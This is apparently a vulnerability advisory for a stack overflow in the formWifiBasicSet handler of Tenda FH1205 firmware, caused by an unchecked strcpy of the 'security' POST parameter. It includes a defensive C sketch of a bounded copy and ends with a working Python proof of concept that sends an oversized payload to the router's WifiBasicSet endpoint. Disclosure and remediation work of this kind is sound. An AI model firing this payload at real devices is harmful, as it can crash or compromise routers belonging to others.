formWifiBasicSet_security.md

File metadata and controls

41 lines (28 loc) · 1.48 KB

Overview

Affected version

FH1205 V2.0.0.7(775)

Vulnerability details

The Tenda FH1205 V2.0.0.7(775) firmware has a stack overflow vulnerability in the formWifiBasicSet function. The v30 variable receives the security parameter from a POST request and is later copied into the v33 variable, an array fixed at 256 bytes. Because the user controls the content and length of security and no length check precedes the copy, the statement strcpy(v33, v30); can write past the end of v33 whenever the supplied value exceeds the array's capacity, causing a buffer overflow.
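
As an added example (not code from the firmware or from the original advisory), the following C sketch shows a bounded copy that a handler could use in place of the unchecked strcpy described above. The function names, the status-code return values, and the sample inputs are assumptions made for illustration; only the 256-byte size of v33 comes from the advisory.

```c
#include <stdio.h>
#include <string.h>

#define SECURITY_BUF_LEN 256 /* size of v33 as stated in the advisory */

/* Pattern described in the advisory (kept as a comment, not compiled):
 *     char v33[256];
 *     strcpy(v33, v30);   // v30 = user-controlled "security" value
 */

/* Bounded copy: returns 0 on success, -1 if src (plus its NUL) does not
 * fit in dst. Never examines more than dst_len bytes of src. */
int copy_param_checked(char *dst, size_t dst_len, const char *src)
{
    const char *nul;

    if (dst == NULL || src == NULL || dst_len == 0)
        return -1;
    nul = memchr(src, '\0', dst_len);
    if (nul == NULL) {          /* no terminator within dst_len bytes */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Hypothetical handler fragment: validates "security" before using it.
 * Return values mimic HTTP status codes and are an assumption. */
int handle_security_param(const char *security)
{
    char v33[SECURITY_BUF_LEN];

    if (copy_param_checked(v33, sizeof v33, security) != 0)
        return 400;             /* reject the request, copy nothing */
    return 200;
}

int main(void)
{
    char oversized[505];        /* constructed input: 504 bytes + NUL */

    memset(oversized, 'a', sizeof oversized - 1);
    oversized[sizeof oversized - 1] = '\0';
    printf("short value -> %d\n", handle_security_param("wpapsk"));
    printf("504-byte value -> %d\n", handle_security_param(oversized));
    return 0;
}
```

The boundary matters: a 255-character value fits in the 256-byte buffer with its terminator, while a 256-character value is rejected.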

PoC

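```python
import requests
from pwn import p32

url = 'http://192.168.84.101/goform/WifiBasicSet'
# 500 filler bytes exceed the 256-byte v33 buffer; a 4-byte marker value follows
payload = b'a' * 500 + p32(0xdeadbeef)
data = {
    'security_5g': '1',
    'hideSsid': '1',
    'ssid': '1',
    'security': payload,  # oversized value that reaches strcpy(v33, v30)
    'wrlPwd': '1',
    'hideSsid_5g': '1',
    'ssid_5g': '1',
    'wrlPwd_5g': '1'
}

requests.post(url, data=data)
```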
